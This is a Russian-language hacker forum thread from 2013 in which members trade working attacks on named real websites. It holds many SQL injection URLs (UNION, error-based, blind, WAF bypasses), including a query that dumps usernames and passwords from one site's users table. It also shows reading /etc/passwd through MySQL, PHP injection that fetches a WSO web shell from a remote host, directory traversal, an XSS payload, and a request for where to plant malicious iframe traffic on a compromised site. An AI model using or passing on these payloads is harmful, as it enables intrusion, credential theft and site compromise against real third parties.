Просмотр полной версии : Ваши вопросы по уязвимостям.
chado said:
Я походу вообще без прав в phpmyadmin. information_schema даже читать не могу, изменения могу вносить только в таблицу test. Думал может можно через изменение этой таблицы что нибудь да залить)
С помощью LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test вывел содержимое в таблицу:
Code:
"# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.4.1 2010/06/14 02:09:06 kensmith Exp $",
"#",
"root:*:0:0:Charlie &:/root:/bin/csh",
"toor:*:0:0:Bourne-again Superuser:/root:",
"daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin",
"operator:*:2:5:System &:/:/usr/sbin/nologin",
"bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin",
"tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin",
"kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin",
"games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin",
"news:*:8:8:News Subsystem:/:/usr/sbin/nologin",
"man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin",
"sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin",
"smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin",
"mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin",
"bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin",
"proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin",
"_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin",
"_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin",
"uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico",
"pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin",
"www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin",
"nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin",
"zeus:*:1001:0:User &:/home/zeus:/bin/csh",
"mysql:*:1002:1001:User &:/home/mysql:/bin/sh",
"foux:*:1003:1003:User &:/home/foux:/bin/sh",
"freeradius:*:1004:1004:User &:/home/freeradius:/bin/sh",
"natusik:*:1005:1005:User &:/usr/www/natusik:/bin/csh",
"roman:*:1006:1006:User &:/usr/www/romankom.ru:/bin/csh",
"roman1:*:1007:1007:User &:/usr/www/kisika.ru:/bin/csh",
"misha:*:1008:0:Mihail Tihomirov:/home/misha:/bin/csh",
Собственно вопрос, где искать пароли? * означает любой пароль? И что я смогу сделать дальше, ftp порт закрыт, mysql порт открыт но не дает соединиться с моего IP. В config.inc.php в папке \phpmyadmin\:
Code:
"$cfg['Servers'][$i]['host'] = 'localhost'; // MySQL hostname or IP address",
"$cfg['Servers'][$i]['port'] = ''; // MySQL port - leave blank for default port",
"$cfg['Servers'][$i]['socket'] = ''; // Path to the socket - leave blank for default socket",
"$cfg['Servers'][$i]['connect_type'] = 'tcp'; // How to connect to MySQL server ('tcp' or 'socket')",
"$cfg['Servers'][$i]['extension'] = 'mysql'; // The php MySQL extension to use ('mysql' or 'mysqli')",
"$cfg['Servers'][$i]['compress'] = FALSE; // Use compressed protocol for the MySQL connection",
" // (requires PHP >= 4.3.0)",
"$cfg['Servers'][$i]['controluser'] = ''; // MySQL control user settings",
" // (this user must have read-only",
"$cfg['Servers'][$i]['controlpass'] = ''; // access to the ""mysql/user""",
" // and ""mysql/db"" tables).",
" // The controluser is also",
" // used for all relational",
" // features (pmadb)",
"$cfg['Servers'][$i]['auth_type'] = 'http'; // Authentication method (config, http or cookie based)?",
"$cfg['Servers'][$i]['user'] = 'root'; // MySQL user",
"$cfg['Servers'][$i]['password'] = ''; // MySQL password (only needed",
" // with 'config' auth_type)",
kingbeef
24.11.2013, 16:57
winstrool said:
Вылажите ссылку уязвимую сего хостинга, а потестив люди скажут, что да как...
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+order+by+6--+f
kingbeef said:
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+order+by+6--+f
Итак, что у нас фильтруется:
1) Скобки;
2) Знак равенства;
3) Выполнение кода в комментариях /*! */ (хотя тут не совсем так)
4) &&
Не фильтрует and, or
Легитимные запросы
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+||+1%3E1+--+
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+and+2%3E1+--+
Копаю дальше.
kingbeef said:
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+order+by+6--+f
Что касается Вашего первого поста. Фильтр на связку union select можно обойти следующим способом:
UNION+--+%0DSELECT
Но до раскрутки еще далеко, вырезаюся запятые. Данный фильтр обходится созданием таблицы с помощью join:
UNION+--+%0DSELECT*FROM(select 1)a join(select 2)b join(select 3)c join(select 4)d join(select 5)e join(select 6)f
Но далее видим, что фильтруются парные скобки (), так что ничего полезного взять с этого с сайта не получится.
Unknowhacker
25.11.2013, 21:31
Не выкручивается, хоть ты тресни
Code:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
Unknowhacker said:
Не выкручивается, хоть ты тресни
Code:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
Тут блайнд везде. Вывод тоже не смог добиться
http://www.bch5.ru/index.phtml?topparam=22&prod_id=16264+and+1=2+union+select+111,222,333+--+
http://www.bch5.ru/index.phtml?topparam=20&scat=404&cat=40+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
Unknowhacker
25.11.2013, 22:18
BigBear said:
Тут блайнд везде. Вывод тоже не смог добиться
http://www.bch5.ru/index.phtml?topparam=22&prod_id=16264+and+1=2+union+select+111,222,333+--+
http://www.bch5.ru/index.phtml?topparam=20&scat=404&cat=40+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
Code:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20and%20(1,1)%3E(select%20count(*),concat ((select%20version()%20),0x3a,floor(rand()*2))%20x %20from%20(select%201%20union%20select%202)%20a%20 group%20by%20x%20limit%201)%23
Duplicate entry '4.1.25-log:0' - самая калечная версия
KolosJey
26.11.2013, 00:57
hostgator.com
Как вариант ->
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=-20'+union/*!12345+select*/1/*!12345,*/2/*!12345,*/3/*!12345,*/@@version/*!12345,*/5/*!12345,*/6--+
--
http://www.bch5.ru
эрорбейс не самый удобный способ, лучше нормальный вывод:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403 UNION SELECT 13717,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43 limit 1,1--+1
KolosJey said:
hostgator.com
Как вариант ->
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=-20'+union/*!12345+select*/1/*!12345,*/2/*!12345,*/3/*!12345,*/@@version/*!12345,*/5/*!12345,*/6--+
--
http://www.bch5.ru
эрорбейс не самый удобный способ, лучше нормальный вывод:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403 UNION SELECT 13717,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43 limit 1,1--+1
13717, что это за число, и как оно находится? объясните или дайте ссылку почитать
psihoz26
26.11.2013, 16:05
никак, заместо 13717 может быть любое число
psihoz26 said:
никак, заместо 13717 может быть любое число
не любое, например
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20SELECT%2013719,2,3,4,5,6,7,8,9, version(),11,12,13,14,15,16,%2017,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33%20,34,35,36,37,38, 39,40,41,42,43%20limit%201,1--+1
такой вариант не проходит и почему пятизначное?
er9j6@ said:
не любое, например
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20SELECT%2013719,2,3,4,5,6,7,8,9, version(),11,12,13,14,15,16,%2017,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33%20,34,35,36,37,38, 39,40,41,42,43%20limit%201,1--+1
такой вариант не проходит и почему пятизначное?
количесто знаков тут не причём))
збоку где вывод выводятся баннеры, каждая ссылка имеет свой id, наведи и увидишь, к примеру 9580
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20SELECT%20
9580
,2,3,4,5,6,7,8,9,version%28%29,11,12,13,14,15,16,% 2017,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33%20,34,35,36,37,38,39,40,41,42,43%20limit%201,1--+1
вот если есть баннеры под определённым id - есть вывод, если нету то и вывода нету
Разобрался, например и так выводится
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+union+select+1,2,3,4,5,6,7,8,9,version(),11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,9580,35,36,37,38,39,40,41,42,43--+
ниужели никто не знает мой вопрос? я думал тут профи сидят
есть такая ссылка типа http://xxx.com/index.php?a=xxx&b=xxx
в переменные A и B можно запихнуть javascript код и он выполняется. как дальше можно раскрутить эту уязвимость(кроме пассивной xss)
PHP inj
site.com/recipe/rss/${@copy('http://site.ru/wso2_pack.txt', 'wso2_pack.php')}
Выдает: Account unavailable
1. В чем ошибка?
2. Где будет расположен шелл?
3. Где можно почитать информацию?
П.с.:
- http://site.ru/wso2_pack.txt - залит шел переименовал в txt;
- wso2_pack.php - путь до самого шелла.
Благодарю.
kingbeef
27.11.2013, 22:10
Always said:
PHP inj
site.com/recipe/rss/${@copy('http://site.ru/wso2_pack.txt', 'wso2_pack.php')}
Выдает: Account unavailable
1. В чем ошибка?
2. Где будет расположен шелл?
3. Где можно почитать информацию?
П.с.:
- http://site.ru/wso2_pack.txt - залит шел переименовал в txt;
- wso2_pack.php - путь до самого шелла.
Благодарю.
Я не разбираюсь, но мне кажется надо указать полный путь.
kingbeef said:
Я не разбираюсь, но мне кажется надо указать полный путь.
Не обязательно. Если хочешь шелл в текущую папку залить, где скрипт выполняется, то надо в его случае:
PHP:
copy('http://site.ru/wso2_pack.txt','./wso2_pack.php');
DeepBlue7
28.11.2013, 19:49
ex'pert said:
Доброго времени суток,
есть сайт с возможностью просмотреть файлы из виндоувс папки, (Directory traversal vuln) например:
Code:
?action=../../../../../../../../../../windows/System.ini%00.jpg
Вопрос можно ли выполнить запрос к командной строке? например послать команду выключения.. пробывал так:
Code:
action=../../../../../../../../../../windows/system32/cmd.exe-shutdown%20-t%200%00.jpg
непомогло. помогите разобратся(
Если нет запуска процесса, то не выйдет.
Есть иньекция вида:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
Пробую делать так:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id+group+by+concat((select+version()),floor(rand(0 )*2))+having+min(0)+or+1+--+1
Но получаю:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)* 2))+having+min(0)+or+1+--+1' at line 1
А если делать union select
Code:
SELECT * FROM `date` WHERE name = 'test' ORDER BY id union select 1
то получаю:
#1221 - Incorrect usage of UNION and ORDER BY
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?
Есть сайт который периодически спонтанно выдает такие ошибки:
Warning: mysql_connect() [function.mysql-connect]: Lost connection to MySQL server at 'reading initial communication packet', system error: 61 in /home/myfolder/data/www/site.su/redirector.php on line 229
Warning: mysql_select_db() [function.mysql-select-db]: Access denied for user 'user'@'localhost' (using password: NO) in /home/myfolder/data/www/site.su/redirector.php on line 230
Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /home/myfolder/data/www/site.su/redirector.php on line 230
Warning: mysql_query() [function.mysql-query]: Access denied for user 'user'@'localhost' (using password: NO) in /home/myfolder/data/www/site.su/redirector.php on line 267
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/myfolder/data/www/site.su/redirector.php on line 267
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/myfolder/data/www/site.su/redirector.php on line 268
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/myfolder/data/www/site.su/redirector.php on line 272
Warning: mysql_close(): no MySQL-Link resource supplied in /home/myfolder/data/www/site.su/redirector.php on line 273
Warning: Cannot modify header information - headers already sent by (output started at /home/myfolder/data/www/site.su/redirector.php:229) in /home/myfolder/data/www/site.su/includes/application_top.php on line 33
Однако морковка (havij) так и не докапалась до бд. Скажите, эти ошибки существенны? и что можно сделать в этом случае.
иногда появляется на странице по адресу типа http://site.su/index.php?cat=x
eD"]
[R]eD said:
Есть иньекция вида:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
Пробую делать так:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id+group+by+concat((select+version()),floor(rand(0 )*2))+having+min(0)+or+1+--+1
Но получаю:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)* 2))+having+min(0)+or+1+--+1' at line 1
А если делать union select
Code:
SELECT * FROM `date` WHERE name = 'test' ORDER BY id union select 1
то получаю:
#1221 - Incorrect usage of UNION and ORDER BY
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?
Инъекция в ORDER BY.
Такие инжекты крутите, как блайнд:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id AND IF(SUBSTR(VERSION(),1,1)=5,SLEEP(5),0)
ex'pert
SQLmap или руками.
eD"]
[R]eD said:
Есть иньекция вида:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?
Дополню ответ, который дал UXOR(может кому будет полезно):
Для эксплуатации инъекций применяется слепой метод:
Бинарный поиск всем знаком. Для того, чтобы вытащить 1 символ, нам необходимо послать 8 запросов.
Code:
SELECT if(ascii(substr(version(),1,1)) 0,
# pow - возведение 2 в степень для получения необходимого числа:
# 2^0 = 1 = 00000001
# 2^1 = 2 = 00000010
# 2^2 = 4 = 00000100
# Так-же для этих целий можно использовать побитовый сдвиг
# он и короче, но символы могут фильтроваться
# (Выше они используются для упрощения)
# 1 > (SELECT 1) = 2
id, -id
))), 1000) LIMIT 9;
Так, что есть пища для размышления.
Unknowhacker
29.11.2013, 13:35
Нашёл, вроде как скулю, но что-то есть сомнения..
Code:
http://www.maxgame.com.ua/index.php?route=product/product&path=76'&product_id=852
UXOR, YaBtr, Вы что-то не то советуете.
eD"]
[R]eD said:
Есть иньекция вида:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)* 2))+having+min(0)+or+1+--+1' at line 1
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?
Code:
ORDER BY id|(SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))
Если бы инъекция была в GROUP BY, то тогда так:
Code:
GROUP BY id is null, concat((SELECT version()),floor(rand(0)*2)) having min(0)
Unknowhacker, там нет инъекции.
ZARO said:
Не обязательно. Если хочешь шелл в текущую папку залить, где скрипт выполняется, то надо в его случае:
PHP:
copy('http://site.ru/wso2_pack.txt','./wso2_pack.php');
Можно пример? А т залиться не получается...да и с багами такими первый раз судьбу связал)
http://blogs.simplefit.ru/recipe/rss/
Sanic1977
30.11.2013, 00:51
Привет всем!
Как обойти фильтрацию incapsula при SQL-инъекции?
Спасибо.
Unknowhacker said:
Нашёл, вроде как скулю, но что-то есть сомнения..
Code:
http://www.maxgame.com.ua/index.php?route=product/product&path=76'&product_id=852
нет там ничего ИМХО
WallHack
01.12.2013, 09:49
Попытка слепого метода в Havij
Почему когда Length of 'Current DB' is 16 все выводит нормально
А когда Length of 'Current DB' is 63 выводится все в кубиках ?
WallHack said:
Попытка слепого метода в Havij
Почему когда Length of 'Current DB' is 16 все выводит нормально
А когда Length of 'Current DB' is 63 выводится все в кубиках ?
Не путайте виды инъекций.
Судя по всему, у вас Blind SQL и Double-Blind (Deep Blind) SQL.
Если первой достаточно логического уровня и ответов типа true-false, то вторая дополнительно зависит от временных задержек между запросом и ответом сервера.
При нестабильной реализации 2ого варианта, вы будете получать не только некорректные данные, но и парсить неправильную длину нужных вам данных.
В вашем случае, Length of 'Current DB' скорее всего равен 62, и инъекция там не наблюдается.
Code:
http://www.artena.ru/index.php?altname=sitemap/print/'
Возможно ли тут продвинуться дальше?)
"]
[AVT] said:
Code:
http://www.artena.ru/index.php?altname=sitemap/print/'
Возможно ли тут продвинуться дальше?)
Не продвинешься
http://www.artena.ru/index.php?altname=sitemap/print'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'
1044: Access denied for user 'artenaru_artena'@'localhost'
Юнион тоже актуален, в сорцах странице отображается, но бессмысленно)
HTML:
http://www.artena.ru/index.php?altname=sitemap/print'union/**/select(1),concat(1999,user(),1,version(),1,databas e()),34,4,5,6,7,8,user(),'10
Можно ли как-то это раскрутить.
http://playzet.ru/stats/hlstats.php?game=dods&minkills=1&mode=players&rank_type=%5c
Там параметр походу выставляется статически, исходя по известным значениям, по параметрам можно только выбрать.Свой запрос туда не вставить
Не всё потеряно -
HTML:
http://playzet.ru/stats/hlstats.php?mode=weaponinfo&weapon=wdeagle\&game=%20or%201=1%20and%20@a:=1%20group%20by%20conc at%28user%28%29,version%28%29,database%28%29,if%28 @a=0,@a:=1,@a:=0%29%29%20having%20min%280%29%20--%20w
подскажите, если havij находит БД и таблицы с названием ???, есть ли смысл крутить что еще?
В конфигах апача прописан alias, например, /secret-folder/ ссылается на /var/private/secret/.
И таким образом, при обращении ко всем доменам на сервере по URLу
domen.com/secret-folder/ все будут попадать туда.
Можно ли как-то закрыть туда доступ для определенного домена?
Вариации через .htaccess не работают, так как он имеет меньший приоритет перед конфигами апача.
-=Cerberus=-
03.12.2013, 10:44
Ehrmann said:
подскажите, если havij находит БД и таблицы с названием ???, есть ли смысл крутить что еще?
но, есть смысл протестировать тот же параметр в SQLMAP
Unknowhacker
04.12.2013, 18:03
Известна версия '5.5.27-log
Code:
http://www.briese.net.ua/shkala-zarplat%27and%28select*from%28select%28name_const% 28version%28%29,1%29%29,name_const%28version%28%29 ,1%29%29a%29and%27
но дальше ни в какую не хочет раскручиваться.
http://www.briese.net.ua/shkala-zarplawertt%27and%28select%201%20from%28select%201 %20from%28select%201%20union%20select%202%20%29fr% 20group%20by%20concat%281,user%28%29,@a:=@a-1%29%20having%20min%28@a:=1%29%29s%29%20--%20w
Code:
http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*
чет не получается может кто поможет нормально раскурить?
GhostW said:
Code:
http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*
чет не получается
может кто поможет нормально раскурить?
как посчитали 5 колонок? и что там делает кавычка? скуля же integer..
http://www.iglobalforum.com/event.php?id=90+and+0+/*!union*/select+1,2,3,4,version(),6,7,8,9,10,1,2,3,4,5,6,7, 8,9,10,1,2,3--+
вывод в
kingbeef
05.12.2013, 01:19
http://wiki.auditory.ru/Semenov_sql_injection'
Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
kingbeef said:
http://wiki.auditory.ru/Semenov_sql_injection'
Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3 a,(select(version())))))='1
привет )) взломал сайт а там такое в файле INDEX.PHP такое :
getDefaultLanguage();
$url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT;
NeoNavigator::jump($url);
?>
и такое :
вот как выглядит сама система :
http://i42.tinypic.com/112hpud.jpg
КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?
zombak18
08.12.2013, 18:39
При переходе на сайте на list.html?page=&page='
выдает
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '-1)*100 + 1 AND \'. (severity 15) in D:\www\*****\type1.inc.php on line 269
Warning: mssql_query() [function.mssql-query]: Query failed in D:\www\*****\type1.inc.php on line 269
Warning: mssql_fetch_array(): supplied argument is not a valid MS SQL-result resource in D:\www\*****\type1.inc.php on line 273
Можно как-то раскрутить и попробовать слить бд или залить шелл? Хелпаните..
Если поставить скобки или другой символ, то же самое выдает.
С &page=(select+top+1+table_name+from+information_sch ema.tables)
Выдает мне Conversion failed when converting the nvarchar value 'Таблица' to data type int. (severity 16) in .....
но при
(select+top+1+table_name+from+information_schema.t ables+where+table_name+not+in+('эта таблица'))
выдает мне message: Incorrect syntax near 'эта же таблица\'. (severity 15) in ....
zombak18
11.12.2013, 00:35
При пост запросе
POST /register.php HTTP/1.1
Host: 1234.net
Content-Type: application/x-www-form-urlencoded
name=%5C&username=5451454&password1=12345&password2=12345&email1=asaa%40mail3.ru&email2=asaa%40mail3.ru
в нейм %5C или \
выдает
Query Error!
Executing: INSERT INTO user values (NULL,'5451454','827ccb0eea8a706c4c34a16891f84e7b' ,'asaa@mail3.ru','\',NOW());
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\',NOW())' at line 1
Здесь куда-то иньекцию подставить можно? или как то это использовать...?
zombak18
11.12.2013, 01:13
OxoTnik said:
zombak18
сам же сказал параметр name уязвим
напрмер введи вместо %5C
(пробелы в запросе убери)
Да вот имеено.. дело в том, что если пишешь какой либо запрос, он просто пропускает это поле и регистрирует аккаунт без ошибок..
%5C' - ошибка
' - нет ошибки
%5C' пробел - нет ошибки
Code:
name=%5c'or(extractvalue(1,concat(0x3a,user()))),1 ); -- w
А так ?
zombak18
11.12.2013, 18:23
Inoms said:
Code:
name=%5c'or(extractvalue(1,concat(0x3a,user()))),1 ); -- w
А так ?
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
zombak18 said:
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
Кроме name другие параметры проходят через фильтр?
Code:
email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()) )),NOW());%23
Можно линк в лс?
zombak18
11.12.2013, 23:35
Inoms said:
Кроме name другие параметры проходят через фильтр?
Code:
email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()) )),NOW());%23
Можно линк в лс?
чекни лс..
kingbeef
12.12.2013, 00:40
zombak18 said:
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
Убери пробел, это форум добавил.
zombak18
12.12.2013, 01:13
kingbeef said:
Убери пробел, это форум добавил.
Пропускает
если появляется другой символ кроме %5c сразу пропускает без ошибок..
jquery cross site scripting - Кто слышал о таких уязвимостях? Что они из себя предстовляют? Может у кого есть примеры или мануал...
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
-=Cerberus=-
12.12.2013, 17:39
Hapk said:
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
забей скулю в SQLMAP. Раскрутит - запусти с параметром --sql-shell и делай запросы как тебе удобно)
Hapk said:
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
никак не изменишь, нельзя в запросе использовать несколько разных операторов
mgVolt said:
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
Там есть нечто большее:
Code:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28info rmation_schema.schemata%29where%281=1%29group%20by %28concat%28version%28%29,0x3b,user%28%29,floor%28 rand%280%29*2%29%29%20%29having%28min%280%29%29%29
Inoms said:
Там есть нечто большее:
Code:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28info rmation_schema.schemata%29where%281=1%29group%20by %28concat%28version%28%29,0x3b,user%28%29,floor%28 rand%280%29*2%29%29%20%29having%28min%280%29%29%29
Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen
mgVolt said:
Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen
Code:
http://www.viu.ca/ImageGen.ashx?font=%3Cscript%3Ealert%28/Test/%29%3C/script%3E
qaz said:
никак не изменишь, нельзя в запросе использовать несколько разных операторов
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой ;.
Например:
PHP:
www.site.com/victim.php?id=10'+union+select+1,2,3...; UPDATE 'admin_login' SET 'password' = 'pas1' WHERE login_name='adm'
В случае с Mysql это не прокатит.
Это ещё зависит от используемого ЯП и функции выполнения запросов. В стандартной mysql_query из php множественные запросы запрещены))
Уважаемые, помогите вывести хоть что нибудь.
http://www.futuresfins.com/fin-detail.php?id=1+union+select+group_concat(0x757365 726e616d65,0x3b,0x70617373776f7264),2,3,4,5,6,7,8, 9,10,11+from+information_schema.columns+where+tabl e_name=0x7573657273+limit+1
MrKloud said:
Уважаемые, помогите вывести хоть что нибудь.
/thread43966.html
www.futuresfins.com/fin-detail.php?id=1+union+select+1,(select(@x)from(sel ect (@x:=0x00),(select(0)from(Future_future2.users)whe re(0x00)in(@x:=concat(@x,0x3c62723e,username,0x3a, password))))x),3,4,5,6,7,8, 9,10,11+--+
YaBtr said:
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой
;
.
Например:
PHP:
www.site.com/victim.php?id=10'+union+select+1,2,3...; UPDATE 'admin_login' SET 'password' = 'pas1' WHERE login_name='adm'
В случае с Mysql это не прокатит.
вот так?
http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
Hapk said:
вот так?
http://site.ru/index.php?id=123'+UNION%0d%0aSELECT+1,2,3,admin,5, 6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE usrname='admin'+--+
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
qaz said:
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
Бля не так просто понял!
Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
Сбербанк, С count(*)сложнее, но данные можно выводить:
Code:
lan=3&pid=0%26((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21)>(SELECT*FROM(SELECT*FROM information_schema.tables LIMIT 1)a1 WHERE @:=ascii(mid(TABLE_SCHEMA,1,1))))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать.
sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
-=Cerberus=-
13.12.2013, 11:41
Доброго времени суток ачатовцы!
подскажите как обойти Incapsula WAF
